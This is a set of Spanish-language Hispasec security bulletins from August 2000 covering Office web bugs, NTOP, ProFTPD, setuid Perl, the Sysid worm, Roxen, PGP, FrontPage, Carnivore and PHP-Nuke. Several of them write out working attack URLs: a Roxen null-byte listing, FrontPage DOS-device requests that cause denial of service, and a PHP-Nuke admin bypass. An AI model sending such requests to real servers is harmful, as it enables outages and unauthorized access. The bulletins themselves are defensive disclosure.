jueves, 31 de agosto de 2000

¿Documentos espía de Microsoft?

La Fundación para la Privacidad (Privacy Foundation) ha hecho
público un comunicado donde describe la posibilidad que tienen los
documentos de Microsoft Office de permitir a sus autores seguir el
rastro de los usuarios que los leen y las organizaciones por las
que se transmite.
En el aviso de la Privacy Foundation se hace referencia a la
posibilidad que tiene Microsoft Word, Excel y PowerPoint de incluir,
lo que se da en llamar, "Web bugs" y que podríamos traducir como
"Chivatos Web". Estos chivatos o espías permiten al autor del
documento detectar y rastrear fugas de documentos confidenciales de
una compañía, rastrear posibles infracciones del Copyright de informes
y boletines, monitorizar la distribución de notas de prensa o vigilar
el uso de texto propio cuando se copia de un documento a otro.

Estos rastreadores son posibles gracias a la capacidad de Microsoft
Word para insertar en un documento un archivo de imagen localizado en
un servidor web remoto, mediante la opción de vincular la dirección
sin guardar el gráfico directamente en el documento. Como sólo se
almacena la URL de la imagen en el documento y no la imagen real,
Word debe recibir dicho gráfico del servidor web cada vez que se abre
el archivo.

Esta característica permite al servidor web identificar cuando y donde
se abre el documento. El servidor almacena la dirección IP y el nombre
del ordenador que realiza la acción, lo que puede incluir el nombre de
la compañía en caso de que el ordenador esté en una empresa con un
dominio en Internet representativo. Lo usual será encontrarse con la
dirección del cortafuegos en el caso de las empresas, y con una IP
dinámica del ISP de los usuarios finales.

Para pasar desapercibido el espía puede ser tan sólo una pequeña
imagen de tan sólo un pixel (de tamaño 1x1) de color blanco. Pero
según el informe de esta fundación el problema puede ir más lejos si
estos espías son capaces de leer y escribir cookies en el ordenador.
Estas cookies podrán permitir al autor del documento identificar al
lector con las visitas que haya realizado al sitio web del autor.

Este tipo de métodos ya se usan en la actualidad por compañías de
publicidad para rastrear la efectividad de sus anuncios en páginas web
y mensajes e-mail. Y según se advierte la problemática no sólo se
centra en Word, sino que puede emplearse de igual forma en documentos
Excel y PowerPoint.

Este tipo de truco puede emplearse por una organización para detectar
si alguno de sus documentos confidenciales o de uso interno llegan a
leerse fuera de la red corporativa. Al documento confidencial se le
puede incluir un "web bug" que realice una petición al servidor web de
la propia empresa. En caso de que se observe una petición al archivo
chivato desde una IP externa a la organización, se podrá saber con
toda seguridad que dicho documento se ha filtrado al exterior, con
posibilidad de conocer si el documento ha llegado a la competencia o
quién abre el texto confidencial.

Las posibilidades que ofrecen estos "web bugs" o chivatos son
infinitas, pueden permitir el rastreo de cada uno de los documentos
generados, para rastrear y seguir los movimientos de cada uno de los
textos marcados de esta forma. También se puede emplear para detectar
el incumplimiento de cláusulas de Copyright y detectar cuantas y
cuales de las cartas personales se copian y distribuyen a otros
usuarios.

Si bien es cierto que todo lo que expone la Privacy Foundation es
cierto, y puede llevarse a la práctica sin problemas, no creemos
que sea motivo de alerta ni que exista ningún tipo de interés o
intencionalidad por parte de Microsoft en llevar más allá las
posibilidades de esta funcionalidad.

Este problema de privacidad no es exclusivo del paquete Office, son
muchos los formatos que ya contemplan la posibilidad de vincular
documentos de la Red, y pueden ser aprovechados con el mismo fin.
Aun más numerosos son los programas que aprovechan Internet para
rastrear a los usuarios y recopilar información adicional, por no
mencionar la estela que dejamos mientras navegamos por las páginas
webs, o el seguimiento que llevan a cabo las cookies. Lejos de lo
que pudiera parecer, Internet no es un buen medio para el anonimato,
al menos por defecto.

Para los usuarios más precavidos, pueden obtener un listado de los
objetos enlazados a un documento Word en el menú Edición, seleccionar
Vínculos, y se abrirá una ventana donde visualizar las referencias.
La opción estará desactivada si el documento activo no posee vínculos.

Para crear un documento de prueba puede abrir un documento nuevo,
menú Insertar, Imagen, desde Archivo, activar Vincular a archivo,
desactivar Guardar con documento, y en nombre de archivo introducir
la cadena "http://www.hispasec.com/logo.gif".

Si está conectado a Internet, observará como se inserta el logo de
Hispasec en el documento. Ahorá tendrá activada la opción Vínculos
del menú Edición, y puede visualizar todos los parámetros del enlace
externo, de forma que es fácil detectar un documento que aproveche
esta funcionalidad. Además, si se abre el documento sin estar
conectado a Internet se produce un error, y en la ventana de aviso
queda al descubierto la URL del vínculo que lo provoca.

Si decide guardar el documento y distribuirlo, cada vez que alguien
lo abra, y esté conectado a Internet, en el servidor web de Hispasec
se registrarán datos como la dirección IP del lector, o la fecha y la
hora en que abrió el documento y descargó la imagen, es decir, la
información mínima que se recopila cuando navegamos por cualquier
página web de Internet. En cuanto a las cookies, podemos configurar
desde el navegador si queremos o no aceptarlas por defecto.

Aprovechando el argumento que nos ocupa, vamos a recomendar el uso
del formato .rtf (Rich Text Format) a la hora de guardar los
documentos, en lugar de los famosos .doc (Microsoft Word), y que puede
aplicarse, sin perdida de funcionalidad, en la mayoría de los
documentos que manejamos a diario. Entre las ventajas encontramos:

- Por defecto no visualiza vínculos, evita los "Web bugs".
- No almacena macros, evita los virus de macro.
- Menor tamaño en comparación con el formato .doc.
- No es un formato exclusivo de Word, puede ser manejado
por multitud de programas.



Antonio Ropero
antonior@hispasec.com
Bernardo Quintero
bernardo@hispasec.com


Más información:

Aviso de la Privacy Foundation
http://www.privacyfoundation.org/advisories/advWordBugs.html

09/04/2000 - Advert.dll, la dll de la polémica (I)
http://www.hispasec.com/unaaldia.asp?id=530

10/04/2000 - Advert.dll, la dll de la polémica (II)
http://www.hispasec.com/unaaldia.asp?id=531

15/4/1999 - Agujeros en los sistemas de navegación anónima
http://www.hispasec.com/unaaldia.asp?id=170



miércoles, 30 de agosto de 2000

NTOP permite leer cualquier archivo del sistema

La utilidad NTOP incluye un microservidor web que, activado, permite
que cualquier usuario con un navegador y con el conocimiento de la
clave correcta pueda visualizar la salida de NTOP de forma remota y en
tiempo real.
NTOP es una utilidad que permite visualizar en tiempo real los
usuarios y aplicaciones que están consumiendo más recursos de red en
un instante concreto, de la misma manera que la utilidad TOP muestra
los procesos que estan consumiendo más CPU o memoria.

NTOP permite lanzar un microservidor web que, si bien está protegido
con una clave, no comprueba la existencia de ".." en el PATH que se
le está solicitando, por lo que un atacante puede leer cualquier
fichero del sistema para el que el usuario que lanzó NTOP tenga
privilegios de lectura.

Por otra parte, si el fichero de control de acceso no existe,
cualquier usuario con un navegador puede acceder a NTOP. Lo correcto
sería que si el fichero de acceso no existe, o bien se deniegue el
acceso a todo el mundo, o bien NTOP debe "quejarse" al ser invocado
con la orden de activar el microservidor web.

Algunos informes señalan que bajo determinadas circunstancias, NTOP
puede permitir ejecutar código arbitrario con los privilegios de ROOT,
ya que parecen haberse descubirto numerosos problemas de "buffer
overflow" y NTOP debe ser ejecutado como "root" (o ser SETUID a
"root") para que pueda analizar el tráfico de red.

Las versiones de NTOP vulnerables son las anteriores a la 1.3.1, al
menos. La recomendación es eliminar el SETUID (bandera "+s") de NTOP,
de forma que sólo sea ejecutable por "root", y no emplear nunca la
opción de microservidor web.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Linux ntop Unauthorized File Retrieval Vulnerability
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1550

ntop -w Buffer Overflow Vulnerability
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1576



martes, 29 de agosto de 2000

Ejecución de código arbitrario en "PROFTPD"

Las versiones de PROFTPD 1.2.0rc2 y previas son vulnerables a varios
ataques de desbordamiento de búfer que permiten la ejecución de
código arbitrario con los privilegios del usuario PROFTPD, típicamente
"root".
PROFTPD es un servidor FTP para entornos UNIX, tradicionalmente
considerado bastante estable y seguro. La versión 1.2.0rc2 y
anteriores contienen diversos errores de programación susceptibles de
producir desbordamientos de búfer y la ejecución de código arbitrario
en el servidor.

El problema más grave y fácilmente atacable puede solucionarse con un
parche muy sencillo (una vez más, ventajas de disponer del código
fuente):

--- src/main.c 2000/01/13 01:47:02 1.3
+++ src/main.c 2000/04/29 19:22:18
@@ -377,7 +377,7 @@
vsnprintf(statbuf, sizeof(statbuf), fmt, msg);

#ifdef HAVE_SETPROCTITLE
- setproctitle(statbuf);
+ setproctitle("%s", statbuf);
#endif /* HAVE_SETPROCTITLE */

va_end(msg);

En cualquier caso, la versión 1.2.0, disponible desde hace un mes,
soluciona estos problemas.

Fe de erratas:
http://www.hispasec.com/unaaldia.asp?id=683



Jesús Cea Avión
jcea@hispasec.com


Más información:

ProFTPD Project
http://www.proftpd.net/

Security
http://www.proftpd.net/security.html

1.2.0pre10 still segfaults with funky NLST command
http://bugs.proftpd.net/show_bug.cgi?id=121

Multiple Vendor ftpd setproctitle() Format String Vulnerability
http://www.securityfocus.com/vdb/bottom.html?vid=1425



lunes, 28 de agosto de 2000

Inseguridad en los datos de Microsoft Money

Money es el programa de contabilidad y gestión de cuentas bancarias,
gastos, etc de Microsoft. Este programa protege el acceso a los datos
mediante el uso de una contraseña, si bien en determinadas condiciones
esta protección puede resultar insuficiente para un atacante curioso.
Microsoft acaba de publicar un parche para solucionar una
vulnerabilidad en las versiones de Money 2000 y 2001, por la cual un
usuario malicioso puede llegar a conseguir la password que protege los
archivos de datos. Según informa Microsoft, el problema reside en que
bajo determinadas circunstancias el programa puede almacenar la
contraseña en texto plano.

Según aclara Microsoft en su boletín de seguridad, la vulnerabilidad
sólo afecta a los datos almacenados en el archivo, en el ordenador
local, de ninguna forma influye sobre los servicios online a los que
Money permite acceder. Además el atacante debe tener acceso físico al
archivo de datos, en ningún caso puede explotarse la vulnerabilidad de
forma remota.

Microsoft advierte que la protección por password de este archivo no
debe entenderse como un sustituto de la protección de acceso a nivel
archivo. La compañía alega que incluso en ausencia de esta
vulnerabilidad los usuarios deben proteger estos archivos mediante
otros medios.

La actualización se puede conseguir de forma automática a través de la
actualización on-line del propio programa, en el menú Herramientas la
opción Actualizar por Internet.



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de Microsoft
http://www.microsoft.com/technet/security/bulletin/ms00-061.asp

Preguntas y Respuestas sobre la vulnerabilidad
http://www.microsoft.com/technet/security/bulletin/fq00-061.asp



domingo, 27 de agosto de 2000

Compromiso de seguridad en "setuid-perl"

El lenguaje PERL en su versión 5.6 (la actual) y anteriores tiene un
fallo de seguridad que, en muchos sistemas, puede permitir que un
usuario local alcance privilegios de administrador o "root".
El lenguaje PERL incluye un ejecutable SETUID que permite la ejecución
de cualquier script con los privilegios de su usuario propietario.
Bajo determinadas circunstancias (cuando se detecta un intento de uso
malicioso), ese intérprete envía un mensaje de aviso al administrador
del sistema, utilizando el ejecutable "/bin/mail". Lamentablemente
dicho programa de correo no está diseñado para ser invocado desde una
aplicación "SETUID", por lo que atacante malicioso local puede
introducirle datos especialmente formateados que le permitan ejecutar
código arbitrario como cualquier otro usuario, especialmente como
"root" o administrador.

Aunque la explotación en sí del fallo se produce en "/bin/mail", no
corresponde a este programa la responsabilidad del problema, ya que se
trata de un componente que nunca se diseñó para ser ejecutado por un
proceso SETUID. La responsabilidad recae exclusivamente sobre SPERL, por
ser un programa de seguridad crítica, SETUID, que lanza procesos fuera
de su control directo y no se preocupa de "limpiar" las variables de
entorno y demás datos de entrada recibidos por dichos procesos, que
nunca fueron diseñados para ser utilizados bajo este tipo de
configuraciones.

Dado que SPERL invoca explícitamente a la aplicación "/bin/mail",
aquellos sistemas que no dispongan de dicha aplicación o ésta se
encuentre en otro path, *NO* serán vulnerables. Entre los sistemas no
vulnerables debido a este hecho tenemos a la distribución Debian de
Linux, o las versiones 2.1.x, 2.2.x, 3.x y 4.0 de FreeBSD.

Los administradores con usuarios locales no confiables deben
actualizar su distribución PERL cuanto antes (la actualización envía
las notificaciones al "syslog", en vez de por email) o, en caso de no
necesitar la funcionalidad SPERL, eliminar la bandera "+s" del
ejecutable.



Jesús Cea Avión
jcea@hispasec.com


Más información:

PERL
http://www.perl.org/

Updated mailx and perl packages are now available
http://www.redhat.com/support/errata/RHSA-2000-048-02.html

Root exploit in sperl
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=15630

suidperl has a major problem
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=15641

sperl vulnerability
http://www.calderasystems.com/support/security/advisories/CSSA-2000-026.0.txt



sábado, 26 de agosto de 2000

Aparece en libertad "Sysid", el gusano de las cien caras

Según ha tenido ocasión de saber el laboratorio de Hispasec en
las últimas horas, se han encontrado indicios de actividad en
libertad (´in-the-wild´) de "Sysid", un gusano de probable origen
asiático que introduce conceptos tan innovadores como peligrosos
en el abanico de posibilidades de la programación de "i-worms".
Se trata de un espécimen programado en Delphi, de formato PE
(´Portable Executable´, ejecutable de Win32), que alcanza los
200 kilobytes de longitud tras haber sido procesado por medio del
conocido compresor Aspack, reduciendo los casi 400 originales.

El gusano se presenta adjunto a un mensaje de correo electrónico
procedente de un usuario conocido, bajo uno de los cien nombres
posibles de los que se vale para camuflarse, entre los que cabría
destacar "Tools.exe", "Phone.exe", "Office98fix.exe", "Joke.exe",
"WinAmp.exe", "MyResume.exe", "BallGame.exe", "PlayBoy.exe",
"Click Me.exe", "Sex Picture.exe" o "MP3.exe" - juegos, programas
relacionados con MP3, sexo, currículums... Los más recurrentes
temas son empleados como armas a favor de "Sysid" para conseguir
despertar la atención de sus futuribles víctimas.

Los e-mails portadores se caracterizan, asimismo, por la ausencia
de texto en el cuerpo del mensaje y por la existencia de otros
tres ficheros adjuntos: un fichero de extensión DOC, JP(E)G o
XLS seleccionado al azar de la carpeta de Documentos del usuario
infectado, y dos mensajes cualesquiera extraídos de la carpeta
"Elementos enviados" del conocido cliente de correo MS Outlook,
sin cuya presencia el gusano "Sysid" es incapaz de funcionar. De
esa misma carpeta es de donde, de igual forma, es elegido el
tema o asunto de los e-mails que finalmente serán enviados desde
los ordenadores infectados, incrementando así la credibilidad
por parte de los futuros destinatarios.

Una vez ejecutado, el fichero huésped que alberga el código del
gusano muestra una ventana en pantalla con el título "Personal
ID Generator", un par de botones de radio para elegir el sexo de
la persona que ejecuta la aplicación, y un botón de salida de
la misma. Se trata de un programa escrito en codificación china
tradicional y de escasa utilidad, cuyo único propósito consiste
en distraer la atención de los destinatarios de "Sysid" mientras
el gusano se instala en el sistema operativo.

Y es precisamente su etapa de instalación en donde encontramos
una nueva particularidad inédita en otros patógenos del género
hasta el momento: tras haber efectuado una copia del código del
programa portador a los directorios por defecto de Windows y de
Sistema bajo el nombre "SYSID.EXE", el gusano crea una nueva llave
en el registro de configuraciones de la máquina local, con el
fin de ser ejecutado en cada arranque:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
WindowsVersion = "sysid"

La aportación novedosa que efectúa este espécimen consiste en
lo que en virología informática se conoce como des/activación
"on the fly", o, lo que es lo mismo, el "malware" esconde todo
indicio de su presencia en cada momento susceptible de poder ser
examinado por el usuario o por algún producto antivirus. En el
caso de "Sysid", el gusano activa la llave anteriormente descrita
sólo en el momento en que detecta que la sesión activa de
Windows está siendo cerrada, y la borra tan pronto como es
ejecutado en el siguiente arranque y su presencia en memoria está
ya garantizada, asegurándose de esta forma de no poder ser ni
descubierto ni desactivado, a menos que el usuario conozca en
detalle las características del patógeno y se decida a borrar
los ficheros semilla, instalados en los directorios del sistema.

Completado el proceso de instalación, la fase final necesaria
para cerrar el ciclo vital de "Sysid" es la expansión. Para esto
el gusano se vale de un pequeño programa escrito en VBS (Visual
Basic Script), que crea en el directorio por defecto de Windows
bajo el nombre "WINVER.VBS". La función de éste consiste en
obtener de forma aleatoria entradas de la libreta de direcciones
del usuario afectado, en un número dependiente a la cantidad de
cuentas que hayan sido añadidas a la misma; así, si el número
es menor de 200, "Sysid" seleccionará un 10%, porcentaje que se
reduce hasta el 2% en caso contrario.

La versatilidad de este "i-worm" complica en cierta medida el
tipo de advertencias que desde el Laboratorio de Hispasec
acostumbramos a compartir con nuestros lectores, pero, sea como
fuere, la regla de oro a seguir a rajatabla para no ser afectado
por un espécimen del género es siempre la misma: desconfiar
por sistema de todo fichero adjunto no solicitado, aun si el
remitente del mensaje portador es un usuario de plena confianza.



Giorgio Talvanti
talvanti@hispasec.com


Más información:

AVP
http://www.avp.ch/avpve/worms/email/sysid.stm

Network Associates
http://vil.nai.com/villib/dispvirus.asp?virus_k=98781

Symantec
http://www.sarc.com/avcenter/venc/data/w32.sysid.worm.html



viernes, 25 de agosto de 2000

Vulnerabilidades en los servidores ROXEN

Algunas de las versiones del servidor web ROXEN son vulnerables a
varios ataques que permiten listar el contenido de directorios (aunque
exista un fichero índice) y el código fuente de los ficheros PIKE,
CGIs, etc.
ROXEN es un servidor web Open Source, al igual que el popular apache,
especialmente diseñado para la gestión de páginas activas. Su diseño
modular y la facilidad para extenderlo con módulos en una gran
variedad de lenguajes lo hacen atractivo para servicios web activos.

Varias versiones 2.0.x de ROXEN son vulnerables a una serie de ataques
que permiten:

a) Listar el contenido de cualquier directorio, aunque exista un
fichero de índice en el mismo.

b) Obtener el código fuente de los ficheros RXML, scrips PIKE,
CGIs, etc.

c) Bajo ciertas cincunstancias, acceder a ficheros protegidos por
ficheros de configuración ".htaccess".

El ataque se realiza utilizando un "%00" (un byte "nulo") en la URL.
Por ejemplo, accediendo a "http://www.victima.com/%00/" se listará el
contenido del directorio raíz del servidor web, aún existiendo un
fichero índice.

En principio esta vulnerabilidad parece existir sólo en algunas
subversiones de la versión 2.0 de Roxen. La antigua versión 1.3 no
parece ser vulnerable, pero el problema no ha sido estudiado en
profundidad y se recomienda aplicar un parche preventivo.

Los usuarios de la versión 2.0 pueden actualizar su servidor
utilizando la interfaz administrativa del mismo para descargar e
instalar la versión nueva. El servidor debe ser reiniciado una vez
instalada la actualización.

En caso de tener algún tipo de problema con la actualización
automática, se puede instalar un parche manual.

El ROXEN SiteBuilder también es vulnerable, aunque sólo a la
vulnerabilidad que lista el contenido de un directorio.

Por otra parte, en una instalación típica ROXEN, el fichero
"/usr/local/roxen/configurations/_configinterface/settings/administrator_uid"
contiene la clave cifrada del administrador web pero, por defecto,
tiene modos 0644. Esto hace que cualquier usuario local pueda acceder
a dicho fichero en lectura y atacar la clave con una de las múltiples
herramientas que existen para ello.



Jesús Cea Avión
jcea@hispasec.com


Más información:

ROXEN
http://www.roxen.com/

Parche para 1.3.122 (a aplicar a server/protocols/httpd.pike)
ftp://ftp.roxen.com/pub/roxen/patches/roxen_1.3.122-http.pike.patch

Parche para 2.0
ftp://ftp.roxen.com/pub/roxen/patches/roxen_2.0.50-http.pike.patch

Parches para otras versiones
ftp://ftp.roxen.com/pub/roxen/patches/

Roxen WebServer %00 Request File/Directory Disclosure Vulnerability
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1510



jueves, 24 de agosto de 2000

Actualización obligada para usuarios de PGP 5.5.x/6.5.3

La popular herramienta de cifrado PGP, en sus versiones de la 5.5.x a
la 6.5.3, se encuentra afectada por una vulnerabilidad en el soporte
de las claves adicionales de descifrado (ADKs). Ya se encuentra
disponible una nueva versión gratuita que corrige este problema,
PGP 6.5.8, cuya instalación recomendamos a todos los usuarios
afectados.
Las ADKs fueron introducidas a partir de la versión 5.5 de PGP con el
fin de permitir asociar claves adicionales a los certificados públicos
de los usuarios, de manera que cuando alguien cifra un mensaje con la
clave pública del usuario también se cifra con la clave adicional.
Cómo ejemplo, una empresa podría exigir una clave corporativa ADK
asociada a las claves públicas de sus empleados, de esta forma, los
mensajes cifrados que alguien dirigiera a uno de los empleados también
podrían ser descifrados utilizando la clave corporativa ADK. También
pueden exigir el proceso inverso, que todos los datos que envíen
cifrados incluyan la clave pública corporativa, para también tener
un control sobre la información cifrada que sale de la compañía.

La vulnerabilidad, publicada por el alemán Ralf Senderek, se presenta
porque las versiones afectadas de PGP aceptan una clave ADK asociada
a una clave pública en áreas del certificado que no han sido firmadas
por la clave privada. Es decir, es posible asociar una clave ADK a una
clave pública sin el consentimiento, ni conocimiento, del usuario
legítimo.

Un atacante podría modificar el certificado público de un usuario para
introducir una clave ADK, y distribuir el certificado falsificado
a terceros, ya sea bien aprovechando los servidores de llaves
públicas o de forma más directa. Si una persona, con una versión
de PGP afectada, utilizara ese certificado falsificado para mandar
un mensaje cifrado al dueño de la clave pública, también lo
haría cifrando con la clave ADK del atacante. De manera que, el
mensaje resultante podría ser descifrado tanto por el destinatario
legítimo como por el atacante.

El CERT resume las condiciones que se han de dar para que se
cumpla con éxito un hipotético ataque:

- El emisor del mensaje cifrado debe utilizar una versión de PGP
afectada por la vulnerabilidad.

- El mensaje debe ser cifrado utilizando el certificado modificado
por el atacante.

- El emisor del mensaje visualizará un cuadro de diálogo avisando
de que existe una clave ADK asociada al certificado (pese a ello,
seguirá con el proceso).

- El emisor del mensaje debe tener la clave ADK del atacante en
su anillo de claves.

- El atacante debe tener acceso al mensaje cifrado que el emisor
envía al usuario legítimo del certificado público modificado.

Si bien explotar la vulnerabilidad conlleva bastantes
condicionantes, se trata de un grave problema, inaceptable en un
producto de éste tipo. No se trata de un error de implementación,
sino que en su diseño no se contempló algo tan obvio cómo estas
simples modificaciones.

De momento, no se conoce ningún ataque real aprovechando esta
vulnerabilidad. Según Network Associates, se ha chequeado
certserver.pgp.com, el mayor servidor de llaves públicas PGP
con 1.2 millones de claves, y no ha encontrado ninguna afectada
por la vulnerabilidad. Así mismo, ha actualizado el software de
certserver.pgp.com y pgpkeys.mit.edu para no permitir los
certificados con claves ADK asociadas sin firmar.

Las actualizaciones para la gama de productos comerciales PGP
se encuentran en desarrollo, y podrán ser descargadas en las
próximas horas. Ya se encuentra disponible la versión freeware
PGP 6.5.8, que corrige esta vulnerabilidad.

Descarga PGP 6.5.8 versión Internacional
Windows 95/98/NT/2000
http://www.pgpi.org/cgi/download.cgi?filename=PGPFW658Win32.zip
Macintosh
http://www.pgpi.org/cgi/download.cgi?filename=PGPFW658Mac.sit.bin

Descarga PGP 6.5.8 versión US
http://web.mit.edu/network/pgp.html

Parche para productos comerciales
PGP Personal Privacy 6.5.3 for Windows HotFix 1
http://download.pgp.com:8001/freeware/PP653HotFix1.zip
PGP Personal Privacy 6.5.2a for Macintosh HotFix 1
http://download.pgp.com:8001/freeware/PPHotFixMac1.sit.hqx

En un intento de tranquilizar a los usuarios, Network Associates ha
hecho salir a la palestra a Phil Zimmermann, padre de PGP, para muchos
guía en la lucha de la privacidad, hasta que a finales de 1997 fueran
comprados ambos, autor y producto, por NAi. En un escueto e impersonal
mensaje, Zimmermann reconoce la vulnerabilidad y afirma que se está
trabajando en las actualizaciones para su corrección:
http://www.pgp.com/other/advisories/phil-message.asp

Ahora, debido a esta vulnerabilidad, cobran de nuevo fuerza los
fantasmas de la "Key Recovery Alliance", organización que fomenta la
tecnología "Key Escrow" para permitir la recuperación y monitorización
de las comunicaciones protegidas. Si bien se supone que ésta
tecnología sólo puede ser usada en casos muy concretos, y bajo el
amparo y autorización de los estamentos jurídicos y gubernamentales,
abre en realidad una importante brecha de seguridad en los sistemas
que la incorporen, ya que nadie puede asegurar que no sea aprovechada
por terceros y/o con otros fines.

Network Associates afirma que no ha incorporado la tecnología
"Key Escrow" en PGP, pero reconoce que está dentro de la "Key Recovery
Alliance" porque era un requisito para poder optar a determinados
contratos gubernamentales.

Ante esta nebulosa, los que se quedaron en la versión PGP 2.6.3i se
reafirman en su decisión, al mismo tiempo que continúa el éxodo a
la versión GnuPG. Para colmo, están circulando unas declaraciones de
Mike Jones, business manager de PGP, donde afirma: "La razón por la
que los investigadores descubrieron la vulnerabilidad es porque
nosotros publicamos el código fuente para su revisión". Esta frase,
sin más contexto, está generando interpretaciones para todos los
gustos.



Bernardo Quintero
bernardo@hispasec.com


Más información:

How PGP Deals With Manipulated Keys (Ralf Senderek)
http://senderek.de/security/key-experiments.html

PGP May Encrypt Data With Unauthorized ADKs (CERT)
http://www.cert.org/advisories/CA-2000-18.html

Ralf Senderek´s important corrections to CERT announcement
http://cryptome.org/pgp-badbug.htm

PGP ADK Security Advisory (NAi)
http://www.pgp.com/other/advisories/adk.asp

Program for confidential e-mails proves flawed
http://cnews.tribune.com/news/story/0,1162,oso-tech-69957,00.html

News Burst: Major security flaw in PGP (ZDnet)
http://www.zdnet.co.uk/news/2000/33/ns-17500.html

Pretty Good Bug Found in PGP (Wired)
http://www.wired.com/news/technology/0,1282,38437,00.html

E-mail Program Proves Flawed
http://www.lasvegassun.com/sunbin/stories/tech/2000/aug/24/082400664.html

Security flaw discovered in Network Associates PGP software
http://www.nwfusion.com/news/2000/0824naipgp.html

The Risks Of "Key Recovery," "Key Escrow," And
"Trusted Third-Party" Encryption
http://www.cdt.org/crypto/risks98/

Key Recovery Alliance
http://www.kra.org/

PGP Security
http://www.pgp.com/

The International PGP Home Page
http://www.pgpi.org/

MIT Distribution Center for PGP
http://web.mit.edu/network/pgp.html

The GNU Privacy Guard
http://www.gnupg.org/

24/05/2000 - PGP 5.0 genera claves inseguras
http://www.hispasec.com/unaaldia.asp?id=575

12/12/1999 - PGP y las leyes de exportación criptográfica de EE.UU.
http://www.hispasec.com/unaaldia.asp?id=411



miércoles, 23 de agosto de 2000

Denegación de servicios a las extensiones FrontPage

Las extensiones de servidor de FrontPage son vulnerables a un ataque de
denegación de servicios remoto que puede impedir todas las operaciones
Frontpage (administración web, WebFolders, interDev, WebBot, etc.) de
un sitio web.
Como suele ser habitual el problema se agrava debido a la sencillez con
la que es posible desarrollar un ataque, ya que se puede realizar
directamente al introducir una URL que incluya un nombre de dispositivo
DOS. Ante dicha petición las extensiones de servidor se colgarán y no
aceptarán más peticiones. Para restaurar las extensiones a su estado
habitual será necesario reiniciar Internet Information Server o todo el
servidor. Existe otro problema derivado por el cual ante una de las
peticiones se puede conseguir la revelación de la ruta física del
servidor web.

Para explotar la vulnerabilidad bastará con realizar una petición al
componente shtml.exe de las extensiones FrontPage. La URL deberá
completarse con un nombre de dispositivo DOS seguido de la extensión
.htm (sino se incluye la extensión no tendrá ningún efecto).

Por ejemplo:

http://www.servidor_vulnerable.com/_vti_bin/shtml.exe/com1.htm
http://www.servidor_vulnerable.com/_vti_bin/shtml.exe/prn.htm
http://www.servidor_vulnerable.com/_vti_bin/shtml.exe/aux.htm

Otros nombres de dispositivos como MAILSLOT, PIPE y UNC no consiguen el
mismo efecto. Pero, con uno de ellos se consigue un efecto lateral por
el cual un atacante puede obtener la información sobre la situación
física o ruta donde se encuentra instalado el servidor web. Mediante la
petición:

http://www. servidor_vulnerable.com/_vti_bin/shtml.exe/pipe.htm

Se recibirá un mensaje de error como el siguiente:

Cannot open "C:\InetPub\wwwroot\pipe.htm": no such file or folder.

Cuando el servidor recibe alguna de las URLs anteriormente mencionadas
se inhabilitan todas las operaciones FrontPage contra dicho sitio web.
Si un servidor contiene múltiples sitios web sólo se verá afectado el
que recibió la petición.

Microsoft no ha informado de este ataque, que sin embargo puede
solucionarse mediante la instalación de las recientemente publicadas
extensiones de servidor Frontpage 1.2, disponibles en:
http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de la vulnerabilidad:
http://www.xato.net/reference/xato-082000-01.htm



martes, 22 de agosto de 2000

El FBI obligado a descubrir a "Carnivoro"

El pasado día 2 de Agosto un Juez Federal dio un plazo de 10 días al
FBI como fecha límite para que establezca el calendario de presentación
de la información solicitada sobre "Carnívoro", el polémico programa
espía usado por la agencia para interceptar correo electrónico.
Esta orden judicial es la reacción a las denuncias provenientes de
diferentes sectores tales como ISPs, La Unión para las Libertades
Civiles (FOIA) y miembros del Congreso norteamericano. Como cabeza
visible de estas demandas se encuentra el EPIC, Centro Electrónico
para la Privacidad en la Información. El FBI ha establecido que
la entrega de documentación a EPIC tendrá lugar cada 45 días, ya
que debe de ir clasificando y filtrando toda la información de la
que disponen, un total de 3000 páginas.

Esta forma de actuación ha encendido los ánimos en la parte
demandante, según David Sobel, de EPIC, "Bajo estas circunstancias,
el FBI podría enviar una página cada 45 días". Por ello que las
peticiones de la EPIC han ido encaminadas a presionar al Juez para
que inste al FBI a detallar un calendario de entrega de la
documentación, lo que permitirá establecer el fin del proceso.

Se especula que los encargados de investigar las especificaciones
técnicas serán expertos de una o varias universidades norteamericanas.
De momento no se conocen detalles sobre el nombramiento de los
especialistas, que en todo momento estarán tutelados directamente
por Janet Reno, fiscal general del estado.

El FBI siempre se ha mantenido reacio a mostrar el funcionamiento
interno de "Carnívoro", lo que realmente descubriría todas las facetas
de su polémico software. La excusa utilizada es el peligro potencial
que entrañaría que las interioridades de "Carnívoro" circulen fuera
de sus círculos, ya que conocer como funciona podría ser aprovechado
por terceros para evitar el filtrado de sus mensajes. El FBI cree que
los usuarios deberían confiar en los estamentos gubernamentales y
jurídicos, sin tener que aportar más pruebas al respecto.



Antonio Román
antonio_roman@hispasec.com


Más información:


Forty-five days of the Carnivore
http://www.securityfocus.com/news/76

Primeras negaciones a la instalación de Carnívoro
http://www.hispasec.com/unaaldia.asp?id=636

FBI revelará material sobre intercepción mensajes en Internet
http://es.news.yahoo.com/000817/3/i0ep.html

FBI releasing Carnivore files
http://www.fcw.com/fcw/articles/2000/0814/web-fbi-08-18-00.asp



lunes, 21 de agosto de 2000

Grave vulnerabilidad en PHP-Nuke

PHP-Nuke es un paquete open source que permite crear y administrar un
portal con noticias y artículos totalmente adaptable, y con un sistema
de control de usuarios. Se ha descubierto una vulnerabilidad que de
forma sencilla puede permitir a un atacante ganar acceso de
administrador y acceder a todos los aspectos de la aplicación.
La sencillez con la que se puede crear y mantener un portal gracias a
este software hace que sea ampliamente empleado por un gran número de
sitios web para desarrollar sus contenidos. Por lo que hemos podido
comprobar un gran número de dichos sistemas son vulnerables ante este
ataque.

El problema recae cuando un atacante accede mediante la URL
http://sitio_vulnerable.com/admin.php3?admin=cualquiera lo que le puede
dar acceso total como administrador, con permisos para añadir o editar
noticias, crear secciones y cualquiera de las acciones que puede
llevar a cabo el administrador.

Para comprobar por que ocurre esto basta con mirar el código encargado
de realizar la autenticación del administrador, en el archivo
auth.inc.php3 a partir de la línea 31:

$admintest = 0;

